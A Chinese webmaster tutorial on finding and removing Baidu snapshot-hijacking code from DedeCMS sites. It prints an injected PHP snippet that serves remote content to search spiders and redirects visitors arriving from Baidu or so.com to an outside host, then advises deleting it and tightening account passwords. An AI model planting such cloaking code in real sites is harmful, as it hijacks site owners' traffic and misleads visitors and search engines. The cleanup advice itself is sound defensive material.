织梦dedecms百度快照劫持注入代码防范与清除

DedeCMS织梦模板百度快照劫持注入代码防范及修正方法,很多站长做站的过程中,都碰过百度快照被劫持等问题,明明已经修复模板文件了,还是没有更新回正常的快照,以织梦CMS系统为例,

往往根目录/index.php也被植入恶意代码,比如如下这种:

<?php
if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']);

foreach ($domain as $v) { if (strpos($fromurl,$v)!==false)

{ $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>

单这段代码就直接把搜索引擎蜘蛛搞晕,带到别的恶意网址去。把其删掉,如果在index.php里没找到,但还是存在类似的问题,可以用dw全站搜索下。

 

特别注意:关于恶意劫持防范,空间,ftp账号,权限,后台账号之类都需要设置下,不能太过简单。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在。
点赞 (0)

1、本站所有资源版权归原公司或原作者所有,如用于商业用途,请购买正版,请下载本站资源试用后删除,感谢您的合作!
2、本站所有资源仅供学习交流使用,将本站资源用于其它任何用途而引起的纠纷,本站不负任何责任。
3、如果您需要使用本站所提供的资源,建议先与原作者联系并征求同意。
4、若您浏览本站过程中发现部分内容侵犯到了您的权益,您也可以通过“联系我们”及时通知网站管理员,并附上侵权内容的证明材料或说明,管理员会在收到通知后的24小时内给予您答复,并将有关侵权的内容删除,感谢您的合作。

361资源网 织梦教程 织梦dedecms百度快照劫持注入代码防范与清除 https://www.361zy.com/12564.html

常见问题
  • 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。
查看详情
  • 首先,要明确自己的空间是否支持PHP+Mysql
    第一步: 将本站下载的源码解压后传到空间或者本地服务器
    第二步: 输入域名 “你的域名/install/index.php”,如果是本地测试的,就输入本地的域名,如http://127.0.0.1/install/index.php 或者 http://localhost/install/index.php 等等。
查看详情

相关文章

评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

织梦dedecms百度快照劫持注入代码防范与清除-海报

分享本文封面